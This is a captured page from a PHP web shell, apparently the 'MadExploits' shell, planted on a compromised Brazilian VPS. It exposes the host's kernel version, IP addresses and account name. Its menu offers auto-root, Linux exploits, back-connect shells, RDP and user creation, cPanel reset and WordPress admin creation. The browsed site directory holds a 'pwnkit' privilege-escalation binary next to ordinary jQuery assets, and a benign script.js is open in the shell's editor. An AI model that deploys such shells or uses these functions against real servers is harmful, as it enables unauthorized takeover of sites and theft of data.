Linux vps-4302913.novaexata.com.br 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
Apache
: 162.214.88.42 | : 216.73.216.99
166 Domain
7.3.33
wwnova
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
wwnova /
public_html /
sisadmin /
shared /
[ HOME SHELL ]
Name
Size
Permission
Action
Chart.js
[ DIR ]
drwxr-xr-x
Chartjs.2.8
[ DIR ]
drwxr-xr-x
DataTables
[ DIR ]
drwxr-xr-x
animate
[ DIR ]
drwxr-xr-x
bootbox
[ DIR ]
drwxr-xr-x
bootbox5.1
[ DIR ]
drwxr-xr-x
bootstrap-4.0.0
[ DIR ]
drwxr-xr-x
chosen
[ DIR ]
drwxr-xr-x
datePicker
[ DIR ]
drwxr-xr-x
datetimepicker
[ DIR ]
drwxr-xr-x
jquery-3.3.1
[ DIR ]
drwxr-xr-x
jquery-3.4.0
[ DIR ]
drwxr-xr-x
mask
[ DIR ]
drwxr-xr-x
moment
[ DIR ]
drwxr-xr-x
zebraDialog
[ DIR ]
drwxr-xr-x
.htaccess
127
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
funcoesExata.js
1.2
KB
-rw-r--r--
jquery-key-restrictions.js
1.09
KB
-rw-r--r--
php.ini
559
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
script.js
2.62
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : script.js
/* Style : MobApp Script JS Version : 1.0 Author : Surjith S M URI : https://surjithctly.in/ Copyright © All rights Reserved */ $(function() { "use strict"; /*----------------------------------- * FIXED MENU - HEADER *-----------------------------------*/ function menuscroll() { var $navmenu = $('.nav-menu'); if ($(window).scrollTop() > 50) { $navmenu.addClass('is-scrolling'); } else { $navmenu.removeClass("is-scrolling"); } } menuscroll(); $(window).on('scroll', function() { menuscroll(); }); /*----------------------------------- * NAVBAR CLOSE ON CLICK *-----------------------------------*/ $('.navbar-nav > li:not(.dropdown) > a').on('click', function() { $('.navbar-collapse').collapse('hide'); }); /* * NAVBAR TOGGLE BG *-----------------*/ var siteNav = $('#navbar'); siteNav.on('show.bs.collapse', function(e) { $(this).parents('.nav-menu').addClass('menu-is-open'); }) siteNav.on('hide.bs.collapse', function(e) { $(this).parents('.nav-menu').removeClass('menu-is-open'); }) /*----------------------------------- * ONE PAGE SCROLLING *-----------------------------------*/ // Select all links with hashes $('a[href*="#"]').not('[href="#"]').not('[href="#0"]').not('[data-toggle="tab"]').on('click', function(event) { // On-page links if (location.pathname.replace(/^\//, '') == this.pathname.replace(/^\//, '') && location.hostname == this.hostname) { // Figure out element to scroll to var target = $(this.hash); target = target.length ? target : $('[name=' + this.hash.slice(1) + ']'); // Does a scroll target exist? if (target.length) { // Only prevent default if animation is actually gonna happen event.preventDefault(); $('html, body').animate({ scrollTop: target.offset().top }, 1000, function() { // Callback after animation // Must change focus! var $target = $(target); $target.focus(); if ($target.is(":focus")) { // Checking if the target was focused return false; } else { $target.attr('tabindex', '-1'); // Adding tabindex for elements not focusable $target.focus(); // Set focus again }; }); } } }); }); /* End Fn */
Close